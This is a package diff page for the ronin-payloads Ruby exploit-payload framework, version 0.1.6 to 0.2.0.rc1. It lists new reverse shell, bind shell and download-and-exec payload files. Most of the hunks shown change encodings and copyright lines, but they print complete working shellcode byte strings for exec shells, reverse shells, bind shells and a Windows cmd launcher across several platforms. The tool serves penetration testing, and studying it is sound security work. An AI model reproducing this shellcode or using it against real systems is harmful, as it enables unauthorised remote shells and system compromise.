ronin-payloads 0.1.6 → 0.2.0.rc1
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- data/.github/workflows/ruby.yml +1 -1
- data/.gitignore +1 -0
- data/.rubocop.yml +0 -3
- data/ChangeLog.md +41 -3
- data/Gemfile +6 -4
- data/README.md +26 -6
- data/Rakefile +10 -0
- data/data/completions/ronin-payloads +127 -0
- data/data/completions/ronin-payloads.yml +16 -0
- data/gemspec.yml +3 -1
- data/lib/ronin/payloads/asm_payload.rb +1 -1
- data/lib/ronin/payloads/binary_payload.rb +1 -1
- data/lib/ronin/payloads/builtin/bin/unix/reverse_shell.c +61 -0
- data/lib/ronin/payloads/builtin/bin/unix/reverse_shell.rb +84 -0
- data/lib/ronin/payloads/builtin/bin/windows/reverse_shell.c +63 -0
- data/lib/ronin/payloads/builtin/bin/windows/reverse_shell.rb +87 -0
- data/lib/ronin/payloads/builtin/cmd/awk/reverse_shell.rb +1 -1
- data/lib/ronin/payloads/builtin/cmd/bash/reverse_shell.rb +1 -1
- data/lib/ronin/payloads/builtin/cmd/lua/reverse_shell.rb +1 -1
- data/lib/ronin/payloads/builtin/cmd/netcat/bind_shell.rb +51 -0
- data/lib/ronin/payloads/builtin/cmd/node/reverse_shell.rb +1 -1
- data/lib/ronin/payloads/builtin/cmd/openssl/reverse_shell.rb +1 -1
- data/lib/ronin/payloads/builtin/cmd/perl/reverse_shell.rb +1 -1
- data/lib/ronin/payloads/builtin/cmd/php/reverse_shell.rb +1 -1
- data/lib/ronin/payloads/builtin/cmd/ping.rb +52 -0
- data/lib/ronin/payloads/builtin/cmd/powershell/reverse_shell.rb +1 -1
- data/lib/ronin/payloads/builtin/cmd/python/reverse_shell.rb +1 -1
- data/lib/ronin/payloads/builtin/cmd/ruby/reverse_shell.rb +1 -1
- data/lib/ronin/payloads/builtin/cmd/sleep.rb +49 -0
- data/lib/ronin/payloads/builtin/cmd/touch.rb +49 -0
- data/lib/ronin/payloads/builtin/cmd/windows/download.rb +70 -0
- data/lib/ronin/payloads/builtin/cmd/zsh/reverse_shell.rb +55 -0
- data/lib/ronin/payloads/builtin/groovy/reverse_shell.rb +54 -0
- data/lib/ronin/payloads/builtin/java/reverse_shell.rb +1 -1
- data/lib/ronin/payloads/builtin/js/nashorn/reverse_shell.rb +63 -0
- data/lib/ronin/payloads/builtin/js/node/reverse_shell.rb +55 -0
- data/lib/ronin/payloads/builtin/php/cmd_exec.rb +1 -1
- data/lib/ronin/payloads/builtin/php/download_exec.php.erb +96 -0
- data/lib/ronin/payloads/builtin/php/download_exec.rb +54 -0
- data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/bind_shell.rb +2 -3
- data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/exec_shell.rb +2 -3
- data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/reverse_shell.rb +2 -3
- data/lib/ronin/payloads/builtin/shellcode/freebsd/x86_64/exec_shell.rb +2 -3
- data/lib/ronin/payloads/builtin/shellcode/linux/arm/bind_shell.rb +2 -3
- data/lib/ronin/payloads/builtin/shellcode/linux/arm/exec_shell.rb +2 -3
- data/lib/ronin/payloads/builtin/shellcode/linux/arm/reverse_shell.rb +2 -3
- data/lib/ronin/payloads/builtin/shellcode/linux/mips/bind_shell.rb +2 -3
- data/lib/ronin/payloads/builtin/shellcode/linux/mips/exec_shell.rb +13 -14
- data/lib/ronin/payloads/builtin/shellcode/linux/mips/reverse_shell.rb +2 -3
- data/lib/ronin/payloads/builtin/shellcode/linux/ppc/exec_shell.rb +15 -16
- data/lib/ronin/payloads/builtin/shellcode/linux/ppc/reverse_shell.rb +2 -3
- data/lib/ronin/payloads/builtin/shellcode/linux/x86/bind_shell.rb +2 -3
- data/lib/ronin/payloads/builtin/shellcode/linux/x86/exec_shell.rb +2 -3
- data/lib/ronin/payloads/builtin/shellcode/linux/x86/reverse_shell.rb +2 -3
- data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/bind_shell.rb +2 -3
- data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/exec_shell.rb +11 -12
- data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/reverse_shell.rb +2 -3
- data/lib/ronin/payloads/builtin/shellcode/macos/x86_64/exec_shell.rb +2 -3
- data/lib/ronin/payloads/builtin/shellcode/macos/x86_64/reverse_shell.rb +2 -3
- data/lib/ronin/payloads/builtin/shellcode/netbsd/x86/exec_shell.rb +2 -3
- data/lib/ronin/payloads/builtin/shellcode/netbsd/x86/reverse_shell.rb +1 -1
- data/lib/ronin/payloads/builtin/shellcode/openbsd/x86/bind_shell.rb +2 -3
- data/lib/ronin/payloads/builtin/shellcode/openbsd/x86/exec_shell.rb +13 -14
- data/lib/ronin/payloads/builtin/shellcode/windows/x86_64/cmd.rb +21 -22
- data/lib/ronin/payloads/builtin/test/cmd.rb +53 -0
- data/lib/ronin/payloads/builtin/test/open_redirect.rb +1 -1
- data/lib/ronin/payloads/builtin/test/url.rb +53 -0
- data/lib/ronin/payloads/builtin/test/xss.rb +1 -1
- data/lib/ronin/payloads/c_payload.rb +4 -60
- data/lib/ronin/payloads/cli/command.rb +1 -1
- data/lib/ronin/payloads/cli/commands/build.rb +3 -3
- data/lib/ronin/payloads/cli/commands/completion.rb +64 -0
- data/lib/ronin/payloads/cli/commands/encode.rb +1 -1
- data/lib/ronin/payloads/cli/commands/encoder.rb +1 -1
- data/lib/ronin/payloads/cli/commands/encoders.rb +1 -1
- data/lib/ronin/payloads/cli/commands/irb.rb +1 -1
- data/lib/ronin/payloads/cli/commands/launch.rb +1 -1
- data/lib/ronin/payloads/cli/commands/list.rb +1 -1
- data/lib/ronin/payloads/cli/commands/show.rb +44 -1
- data/lib/ronin/payloads/cli/encoder_methods.rb +1 -1
- data/lib/ronin/payloads/cli/format_option.rb +1 -1
- data/lib/ronin/payloads/cli/payload_command.rb +1 -1
- data/lib/ronin/payloads/cli/payload_methods.rb +1 -1
- data/lib/ronin/payloads/cli/printing.rb +5 -2
- data/lib/ronin/payloads/cli/ruby_shell.rb +1 -1
- data/lib/ronin/payloads/cli.rb +1 -1
- data/lib/ronin/payloads/coldfusion_payload.rb +1 -1
- data/lib/ronin/payloads/command_payload.rb +1 -1
- data/lib/ronin/payloads/encoders/builtin/html/encode.rb +1 -1
- data/lib/ronin/payloads/encoders/builtin/js/encode.rb +1 -1
- data/lib/ronin/payloads/encoders/builtin/powershell/encode.rb +1 -1
- data/lib/ronin/payloads/encoders/builtin/shell/encode.rb +1 -1
- data/lib/ronin/payloads/encoders/builtin/sql/encode.rb +1 -1
- data/lib/ronin/payloads/encoders/builtin/xml/encode.rb +1 -1
- data/lib/ronin/payloads/encoders/encoder.rb +1 -1
- data/lib/ronin/payloads/encoders/exceptions.rb +1 -1
- data/lib/ronin/payloads/encoders/html_encoder.rb +1 -1
- data/lib/ronin/payloads/encoders/javascript_encoder.rb +1 -1
- data/lib/ronin/payloads/encoders/pipeline.rb +1 -1
- data/lib/ronin/payloads/encoders/powershell_encoder.rb +1 -1
- data/lib/ronin/payloads/encoders/registry.rb +1 -1
- data/lib/ronin/payloads/encoders/shell_encoder.rb +1 -1
- data/lib/ronin/payloads/encoders/sql_encoder.rb +1 -1
- data/lib/ronin/payloads/encoders/xml_encoder.rb +1 -1
- data/lib/ronin/payloads/encoders.rb +1 -1
- data/lib/ronin/payloads/exceptions.rb +1 -1
- data/lib/ronin/payloads/go_payload.rb +6 -2
- data/lib/ronin/payloads/groovy_payload.rb +49 -0
- data/lib/ronin/payloads/html_payload.rb +1 -1
- data/lib/ronin/payloads/java_payload.rb +6 -2
- data/lib/ronin/payloads/javascript_payload.rb +1 -1
- data/lib/ronin/payloads/jsp_payload.rb +1 -1
- data/lib/ronin/payloads/metadata/arch.rb +1 -1
- data/lib/ronin/payloads/metadata/os.rb +1 -1
- data/lib/ronin/payloads/mixins/binary.rb +1 -1
- data/lib/ronin/payloads/mixins/bind_shell.rb +1 -1
- data/lib/ronin/payloads/mixins/build_dir.rb +1 -1
- data/lib/ronin/payloads/mixins/c_compiler.rb +250 -0
- data/lib/ronin/payloads/mixins/erb.rb +1 -1
- data/lib/ronin/payloads/mixins/network.rb +1 -1
- data/lib/ronin/payloads/mixins/post_ex.rb +1 -1
- data/lib/ronin/payloads/mixins/resolve_host.rb +1 -1
- data/lib/ronin/payloads/mixins/reverse_shell.rb +3 -1
- data/lib/ronin/payloads/mixins/tempfile.rb +1 -1
- data/lib/ronin/payloads/mixins/typescript.rb +6 -2
- data/lib/ronin/payloads/nashorn_payload.rb +51 -0
- data/lib/ronin/payloads/node_js_payload.rb +1 -1
- data/lib/ronin/payloads/payload.rb +1 -1
- data/lib/ronin/payloads/php_payload.rb +1 -1
- data/lib/ronin/payloads/powershell_payload.rb +1 -1
- data/lib/ronin/payloads/python_payload.rb +1 -1
- data/lib/ronin/payloads/registry.rb +1 -1
- data/lib/ronin/payloads/root.rb +1 -1
- data/lib/ronin/payloads/ruby_payload.rb +1 -1
- data/lib/ronin/payloads/rust_payload.rb +6 -2
- data/lib/ronin/payloads/shell_payload.rb +1 -1
- data/lib/ronin/payloads/shellcode/bind_shell_payload.rb +1 -1
- data/lib/ronin/payloads/shellcode/exec_shell_payload.rb +1 -1
- data/lib/ronin/payloads/shellcode/reverse_shell_payload.rb +1 -1
- data/lib/ronin/payloads/shellcode_payload.rb +1 -1
- data/lib/ronin/payloads/sql_payload.rb +1 -1
- data/lib/ronin/payloads/url_payload.rb +1 -1
- data/lib/ronin/payloads/version.rb +2 -2
- data/lib/ronin/payloads/xml_payload.rb +1 -1
- data/lib/ronin/payloads.rb +1 -1
- data/man/ronin-payloads-build.1 +16 -30
- data/man/ronin-payloads-build.1.md +15 -11
- data/man/ronin-payloads-completion.1 +76 -0
- data/man/ronin-payloads-completion.1.md +78 -0
- data/man/ronin-payloads-encode.1 +12 -24
- data/man/ronin-payloads-encode.1.md +11 -7
- data/man/ronin-payloads-encoder.1 +9 -18
- data/man/ronin-payloads-encoder.1.md +8 -4
- data/man/ronin-payloads-encoders.1 +8 -16
- data/man/ronin-payloads-encoders.1.md +7 -3
- data/man/ronin-payloads-irb.1 +8 -15
- data/man/ronin-payloads-irb.1.md +6 -2
- data/man/ronin-payloads-launch.1 +11 -20
- data/man/ronin-payloads-launch.1.md +9 -5
- data/man/ronin-payloads-list.1 +9 -16
- data/man/ronin-payloads-list.1.md +7 -3
- data/man/ronin-payloads-new.1.md +13 -9
- data/man/ronin-payloads-show.1 +11 -20
- data/man/ronin-payloads-show.1.md +9 -5
- data/man/ronin-payloads.1 +18 -26
- data/man/ronin-payloads.1.md +17 -10
- data/scripts/setup +58 -0
- metadata +30 -4
@@ -1,10 +1,9 @@
|
|
1
|
-
# encoding: ASCII-8BIT
|
2
1
|
# frozen_string_literal: true
|
3
2
|
#
|
4
3
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
5
4
|
# payloads.
|
6
5
|
#
|
7
|
-
# Copyright (c) 2007-
|
6
|
+
# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
|
8
7
|
#
|
9
8
|
# ronin-payloads is free software: you can redistribute it and/or modify
|
10
9
|
# it under the terms of the GNU Lesser General Public License as published
|
@@ -59,7 +58,7 @@ module Ronin
|
|
59
58
|
"\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48" \
|
60
59
|
"\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a" \
|
61
60
|
"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54" \
|
62
|
-
"\x5f\x6a\x3b\x58\x0f\x05"
|
61
|
+
"\x5f\x6a\x3b\x58\x0f\x05".b
|
63
62
|
end
|
64
63
|
|
65
64
|
end
|
@@ -1,10 +1,9 @@
|
|
1
|
-
# encoding: ASCII-8BIT
|
2
1
|
# frozen_string_literal: true
|
3
2
|
#
|
4
3
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
5
4
|
# payloads.
|
6
5
|
#
|
7
|
-
# Copyright (c) 2007-
|
6
|
+
# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
|
8
7
|
#
|
9
8
|
# ronin-payloads is free software: you can redistribute it and/or modify
|
10
9
|
# it under the terms of the GNU Lesser General Public License as published
|
@@ -56,7 +55,7 @@ module Ronin
|
|
56
55
|
@payload = "\x48\x31\xd2\x48\xc7\xc0\xf6\xff\xff\x01" \
|
57
56
|
"\x48\x83\xc0\x45\x5f\x52\x57\x48\x89\xe6" \
|
58
57
|
"\x0f\x05\xe8\xe5\xff\xff\xff\x2f\x62\x69" \
|
59
|
-
"\x6e\x2f\x2f\x73\x68"
|
58
|
+
"\x6e\x2f\x2f\x73\x68".b
|
60
59
|
end
|
61
60
|
|
62
61
|
end
|
@@ -1,10 +1,9 @@
|
|
1
|
-
# encoding: ASCII-8BIT
|
2
1
|
# frozen_string_literal: true
|
3
2
|
#
|
4
3
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
5
4
|
# payloads.
|
6
5
|
#
|
7
|
-
# Copyright (c) 2007-
|
6
|
+
# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
|
8
7
|
#
|
9
8
|
# ronin-payloads is free software: you can redistribute it and/or modify
|
10
9
|
# it under the terms of the GNU Lesser General Public License as published
|
@@ -61,7 +60,7 @@ module Ronin
|
|
61
60
|
"\xe8\x08\x48\x31\xf6\x4c\x89\xc0\x4c\x89\xe7\x0f\x05\x48\x83" \
|
62
61
|
"\xfe\x02\x48\xff\xc6\x76\xef\x49\x83\xe8\x1f\x4c\x89\xc0\x48" \
|
63
62
|
"\x31\xd2\x49\xbd\xff\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xed" \
|
64
|
-
"\x08\x41\x55\x48\x89\xe7\x48\x31\xf6\x0f\x05"
|
63
|
+
"\x08\x41\x55\x48\x89\xe7\x48\x31\xf6\x0f\x05".b
|
65
64
|
end
|
66
65
|
|
67
66
|
end
|
@@ -1,10 +1,9 @@
|
|
1
|
-
# encoding: ASCII-8BIT
|
2
1
|
# frozen_string_literal: true
|
3
2
|
#
|
4
3
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
5
4
|
# payloads.
|
6
5
|
#
|
7
|
-
# Copyright (c) 2007-
|
6
|
+
# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
|
8
7
|
#
|
9
8
|
# ronin-payloads is free software: you can redistribute it and/or modify
|
10
9
|
# it under the terms of the GNU Lesser General Public License as published
|
@@ -75,7 +74,7 @@ module Ronin
|
|
75
74
|
"\x01\x01\x01\x01" \
|
76
75
|
"\x02\x02\x02\x02" \
|
77
76
|
"\x03\x03\x03\x03" \
|
78
|
-
"\x9a\x04\x04\x04\x04\x07\x04"
|
77
|
+
"\x9a\x04\x04\x04\x04\x07\x04".b
|
79
78
|
end
|
80
79
|
|
81
80
|
end
|
@@ -4,7 +4,7 @@
|
|
4
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
5
5
|
# payloads.
|
6
6
|
#
|
7
|
-
# Copyright (c) 2007-
|
7
|
+
# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
|
8
8
|
#
|
9
9
|
# ronin-payloads is free software: you can redistribute it and/or modify
|
10
10
|
# it under the terms of the GNU Lesser General Public License as published
|
@@ -1,10 +1,9 @@
|
|
1
|
-
# encoding: ASCII-8BIT
|
2
1
|
# frozen_string_literal: true
|
3
2
|
#
|
4
3
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
5
4
|
# payloads.
|
6
5
|
#
|
7
|
-
# Copyright (c) 2007-
|
6
|
+
# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
|
8
7
|
#
|
9
8
|
# ronin-payloads is free software: you can redistribute it and/or modify
|
10
9
|
# it under the terms of the GNU Lesser General Public License as published
|
@@ -61,7 +60,7 @@ module Ronin
|
|
61
60
|
"\xef\xeb\x23\x5b\x89\x1f\x31\xc9\x88\x4b\x07\x89\x4f\x04\x51\x8d" \
|
62
61
|
"\x07\x50\x8b\x07\x50\x50\x31\xc0\xb0\x3b\xcd\x80\x31\xc9\x51\x51" \
|
63
62
|
"\x31\xc0\xb0\x01\xcd\x80\xe8\xd8\xff\xff\xff\x2f\x62\x69\x6e\x2f" \
|
64
|
-
"\x73\x68\x41\x90"
|
63
|
+
"\x73\x68\x41\x90".b
|
65
64
|
end
|
66
65
|
|
67
66
|
end
|
@@ -1,10 +1,9 @@
|
|
1
|
-
# encoding: ASCII-8BIT
|
2
1
|
# frozen_string_literal: true
|
3
2
|
#
|
4
3
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
5
4
|
# payloads.
|
6
5
|
#
|
7
|
-
# Copyright (c) 2007-
|
6
|
+
# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
|
8
7
|
#
|
9
8
|
# ronin-payloads is free software: you can redistribute it and/or modify
|
10
9
|
# it under the terms of the GNU Lesser General Public License as published
|
@@ -53,18 +52,18 @@ module Ronin
|
|
53
52
|
# Builds the shellcode.
|
54
53
|
#
|
55
54
|
def build
|
56
|
-
@payload = "\x99" + # cltd
|
57
|
-
"\x52" + # push %edx
|
58
|
-
"\x68\x6e\x2f\x73\x68" + # push $0x68732f6e
|
59
|
-
"\x68\x2f\x2f\x62\x69" + # push $0x69622f2f
|
60
|
-
"\x89\xe3" + # mov %esp,%ebx
|
61
|
-
"\x52" + # push %edx
|
62
|
-
"\x54" + # push %esp
|
63
|
-
"\x53" + # push %ebx
|
64
|
-
"\x53" + # push %ebx
|
65
|
-
"\x6a\x3b" + # push $0x3b
|
66
|
-
"\x58" + # pop %eax
|
67
|
-
"\xcd\x80" # int $0x80
|
55
|
+
@payload = "\x99".b + # cltd
|
56
|
+
"\x52".b + # push %edx
|
57
|
+
"\x68\x6e\x2f\x73\x68".b + # push $0x68732f6e
|
58
|
+
"\x68\x2f\x2f\x62\x69".b + # push $0x69622f2f
|
59
|
+
"\x89\xe3".b + # mov %esp,%ebx
|
60
|
+
"\x52".b + # push %edx
|
61
|
+
"\x54".b + # push %esp
|
62
|
+
"\x53".b + # push %ebx
|
63
|
+
"\x53".b + # push %ebx
|
64
|
+
"\x6a\x3b".b + # push $0x3b
|
65
|
+
"\x58".b + # pop %eax
|
66
|
+
"\xcd\x80".b # int $0x80
|
68
67
|
end
|
69
68
|
|
70
69
|
end
|
@@ -1,10 +1,9 @@
|
|
1
|
-
# encoding: ASCII-8BIT
|
2
1
|
# frozen_string_literal: true
|
3
2
|
#
|
4
3
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
5
4
|
# payloads.
|
6
5
|
#
|
7
|
-
# Copyright (c) 2007-
|
6
|
+
# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
|
8
7
|
#
|
9
8
|
# ronin-payloads is free software: you can redistribute it and/or modify
|
10
9
|
# it under the terms of the GNU Lesser General Public License as published
|
@@ -53,26 +52,26 @@ module Ronin
|
|
53
52
|
# Builds the shellcode.
|
54
53
|
#
|
55
54
|
def build
|
56
|
-
@payload = "\x31\xC9" + # xor ecx,ecx
|
57
|
-
"\x64\x8B\x71\x30" + # mov esi,[fs:ecx+0x30]
|
58
|
-
"\x8B\x76\x0C" + # mov esi,[esi+0xc]
|
59
|
-
"\x8B\x76\x1C" + # mov esi,[esi+0x1c]
|
60
|
-
"\x8B\x36" + # mov esi,[esi]
|
61
|
-
"\x8B\x06" + # mov eax,[esi]
|
62
|
-
"\x8B\x68\x08" + # mov ebp,[eax+0x8]
|
63
|
-
"\xEB\x20" + # jmp short 0x35
|
64
|
-
"\x5B" + # pop ebx
|
65
|
-
"\x53" + # push ebx
|
66
|
-
"\x55" + # push ebp
|
67
|
-
"\x5B" + # pop ebx
|
68
|
-
"\x81\xEB\x11\x11\x11\x11" + # sub ebx,0x11111111
|
69
|
-
"\x81\xC3\xDA\x3F\x1A\x11" + # add ebx,0x111a3fda (for seven X86 add ebx,0x1119f7a6)
|
70
|
-
"\xFF\xD3" + # call ebx
|
71
|
-
"\x81\xC3\x11\x11\x11\x11" + # add ebx,0x11111111
|
72
|
-
"\x81\xEB\x8C\xCC\x18\x11" + # sub ebx,0x1118cc8c (for seven X86 sub ebx,0x1114ccd7)
|
73
|
-
"\xFF\xD3" + # call ebx
|
74
|
-
"\xE8\xDB\xFF\xFF\xFF" + # call dword 0x15
|
75
|
-
"\x63\x6d\x64" # db "cmd"
|
55
|
+
@payload = "\x31\xC9".b + # xor ecx,ecx
|
56
|
+
"\x64\x8B\x71\x30".b + # mov esi,[fs:ecx+0x30]
|
57
|
+
"\x8B\x76\x0C".b + # mov esi,[esi+0xc]
|
58
|
+
"\x8B\x76\x1C".b + # mov esi,[esi+0x1c]
|
59
|
+
"\x8B\x36".b + # mov esi,[esi]
|
60
|
+
"\x8B\x06".b + # mov eax,[esi]
|
61
|
+
"\x8B\x68\x08".b + # mov ebp,[eax+0x8]
|
62
|
+
"\xEB\x20".b + # jmp short 0x35
|
63
|
+
"\x5B".b + # pop ebx
|
64
|
+
"\x53".b + # push ebx
|
65
|
+
"\x55".b + # push ebp
|
66
|
+
"\x5B".b + # pop ebx
|
67
|
+
"\x81\xEB\x11\x11\x11\x11".b + # sub ebx,0x11111111
|
68
|
+
"\x81\xC3\xDA\x3F\x1A\x11".b + # add ebx,0x111a3fda (for seven X86 add ebx,0x1119f7a6)
|
69
|
+
"\xFF\xD3".b + # call ebx
|
70
|
+
"\x81\xC3\x11\x11\x11\x11".b + # add ebx,0x11111111
|
71
|
+
"\x81\xEB\x8C\xCC\x18\x11".b + # sub ebx,0x1118cc8c (for seven X86 sub ebx,0x1114ccd7)
|
72
|
+
"\xFF\xD3".b + # call ebx
|
73
|
+
"\xE8\xDB\xFF\xFF\xFF".b + # call dword 0x15
|
74
|
+
"\x63\x6d\x64".b # db "cmd"
|
76
75
|
end
|
77
76
|
|
78
77
|
end
|
@@ -0,0 +1,53 @@
|
|
1
|
+
# frozen_string_literal: true
|
2
|
+
#
|
3
|
+
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
4
|
+
# payloads.
|
5
|
+
#
|
6
|
+
# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
|
7
|
+
#
|
8
|
+
# ronin-payloads is free software: you can redistribute it and/or modify
|
9
|
+
# it under the terms of the GNU Lesser General Public License as published
|
10
|
+
# by the Free Software Foundation, either version 3 of the License, or
|
11
|
+
# (at your option) any later version.
|
12
|
+
#
|
13
|
+
# ronin-payloads is distributed in the hope that it will be useful,
|
14
|
+
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
15
|
+
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
16
|
+
# GNU Lesser General Public License for more details.
|
17
|
+
#
|
18
|
+
# You should have received a copy of the GNU Lesser General Public License
|
19
|
+
# along with ronin-payloads. If not, see <https://www.gnu.org/licenses/>.
|
20
|
+
#
|
21
|
+
|
22
|
+
require 'ronin/payloads/command_payload'
|
23
|
+
|
24
|
+
module Ronin
|
25
|
+
module Payloads
|
26
|
+
module Test
|
27
|
+
#
|
28
|
+
# A test command payload. Allows using a custom command with exploits that
|
29
|
+
# require a command payload.
|
30
|
+
#
|
31
|
+
# @since 0.2.0
|
32
|
+
#
|
33
|
+
class CMD < CommandPayload
|
34
|
+
|
35
|
+
register 'test/cmd'
|
36
|
+
|
37
|
+
summary "A test command payload"
|
38
|
+
description <<~DESC
|
39
|
+
Allows specifying a custom command for exploits that require a
|
40
|
+
command payload.
|
41
|
+
DESC
|
42
|
+
|
43
|
+
param :command, String, required: true,
|
44
|
+
desc: 'The command to execute'
|
45
|
+
|
46
|
+
def build
|
47
|
+
@payload = params[:command]
|
48
|
+
end
|
49
|
+
|
50
|
+
end
|
51
|
+
end
|
52
|
+
end
|
53
|
+
end
|
@@ -3,7 +3,7 @@
|
|
3
3
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
4
4
|
# payloads.
|
5
5
|
#
|
6
|
-
# Copyright (c) 2007-
|
6
|
+
# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
|
7
7
|
#
|
8
8
|
# ronin-payloads is free software: you can redistribute it and/or modify
|
9
9
|
# it under the terms of the GNU Lesser General Public License as published
|
@@ -0,0 +1,53 @@
|
|
1
|
+
# frozen_string_literal: true
|
2
|
+
#
|
3
|
+
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
4
|
+
# payloads.
|
5
|
+
#
|
6
|
+
# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
|
7
|
+
#
|
8
|
+
# ronin-payloads is free software: you can redistribute it and/or modify
|
9
|
+
# it under the terms of the GNU Lesser General Public License as published
|
10
|
+
# by the Free Software Foundation, either version 3 of the License, or
|
11
|
+
# (at your option) any later version.
|
12
|
+
#
|
13
|
+
# ronin-payloads is distributed in the hope that it will be useful,
|
14
|
+
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
15
|
+
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
16
|
+
# GNU Lesser General Public License for more details.
|
17
|
+
#
|
18
|
+
# You should have received a copy of the GNU Lesser General Public License
|
19
|
+
# along with ronin-payloads. If not, see <https://www.gnu.org/licenses/>.
|
20
|
+
#
|
21
|
+
|
22
|
+
require 'ronin/payloads/url_payload'
|
23
|
+
|
24
|
+
module Ronin
|
25
|
+
module Payloads
|
26
|
+
module Test
|
27
|
+
#
|
28
|
+
# A test URL payload. Allows using a custom URL with exploits that
|
29
|
+
# require a URL payload.
|
30
|
+
#
|
31
|
+
# @since 0.2.0
|
32
|
+
#
|
33
|
+
class URL < URLPayload
|
34
|
+
|
35
|
+
register 'test/url'
|
36
|
+
|
37
|
+
summary "A test command payload"
|
38
|
+
description <<~DESC
|
39
|
+
Allows specifying a custom URL for exploits that require a
|
40
|
+
URL payload.
|
41
|
+
DESC
|
42
|
+
|
43
|
+
param :url, String, required: true,
|
44
|
+
desc: 'The custom URL'
|
45
|
+
|
46
|
+
def build
|
47
|
+
@payload = params[:url]
|
48
|
+
end
|
49
|
+
|
50
|
+
end
|
51
|
+
end
|
52
|
+
end
|
53
|
+
end
|
@@ -3,7 +3,7 @@
|
|
3
3
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
4
4
|
# payloads.
|
5
5
|
#
|
6
|
-
# Copyright (c) 2007-
|
6
|
+
# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
|
7
7
|
#
|
8
8
|
# ronin-payloads is free software: you can redistribute it and/or modify
|
9
9
|
# it under the terms of the GNU Lesser General Public License as published
|
@@ -3,7 +3,7 @@
|
|
3
3
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
4
4
|
# payloads.
|
5
5
|
#
|
6
|
-
# Copyright (c) 2007-
|
6
|
+
# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
|
7
7
|
#
|
8
8
|
# ronin-payloads is free software: you can redistribute it and/or modify
|
9
9
|
# it under the terms of the GNU Lesser General Public License as published
|
@@ -20,6 +20,7 @@
|
|
20
20
|
#
|
21
21
|
|
22
22
|
require 'ronin/payloads/binary_payload'
|
23
|
+
require 'ronin/payloads/mixins/c_compiler'
|
23
24
|
|
24
25
|
module Ronin
|
25
26
|
module Payloads
|
@@ -28,6 +29,8 @@ module Ronin
|
|
28
29
|
#
|
29
30
|
class CPayload < BinaryPayload
|
30
31
|
|
32
|
+
include Mixins::CCompiler
|
33
|
+
|
31
34
|
#
|
32
35
|
# Returns the type or kind of payload.
|
33
36
|
#
|
@@ -42,65 +45,6 @@ module Ronin
|
|
42
45
|
:c
|
43
46
|
end
|
44
47
|
|
45
|
-
#
|
46
|
-
# The default C compiler.
|
47
|
-
#
|
48
|
-
# @return [String]
|
49
|
-
#
|
50
|
-
def self.cc
|
51
|
-
ENV['CC'] || 'cc'
|
52
|
-
end
|
53
|
-
|
54
|
-
param :cc, required: true,
|
55
|
-
default: -> { cc },
|
56
|
-
desc: 'The C compiler to use'
|
57
|
-
|
58
|
-
#
|
59
|
-
# Compiles one or more source files using `cc`.
|
60
|
-
#
|
61
|
-
# @param [Array<String>] source_files
|
62
|
-
# The source file(s) to compile.
|
63
|
-
#
|
64
|
-
# @param [String] output
|
65
|
-
# The output file path.
|
66
|
-
#
|
67
|
-
# @param [Array<String>, Hash{Symbol,String => String}, nil] defs
|
68
|
-
# Additional macro definitions to pass to the compiler.
|
69
|
-
#
|
70
|
-
# @raise [ArgumentError]
|
71
|
-
# `defs` was not an Array or a Hash.
|
72
|
-
#
|
73
|
-
# @raise [BuildFailed]
|
74
|
-
# The `cc` command failed or is not installed.
|
75
|
-
#
|
76
|
-
def compile(*source_files, output: , defs: nil)
|
77
|
-
args = [params[:cc], '-o', output]
|
78
|
-
|
79
|
-
if defs
|
80
|
-
case defs
|
81
|
-
when Array
|
82
|
-
defs.each do |value|
|
83
|
-
args << "-D#{value}"
|
84
|
-
end
|
85
|
-
when Hash
|
86
|
-
defs.each do |name,value|
|
87
|
-
args << "-D#{name}=#{value}"
|
88
|
-
end
|
89
|
-
else
|
90
|
-
raise(ArgumentError,"defs must be either an Array or a Hash: #{defs.inspect}")
|
91
|
-
end
|
92
|
-
end
|
93
|
-
|
94
|
-
args.concat(source_files)
|
95
|
-
|
96
|
-
case system(*args)
|
97
|
-
when false
|
98
|
-
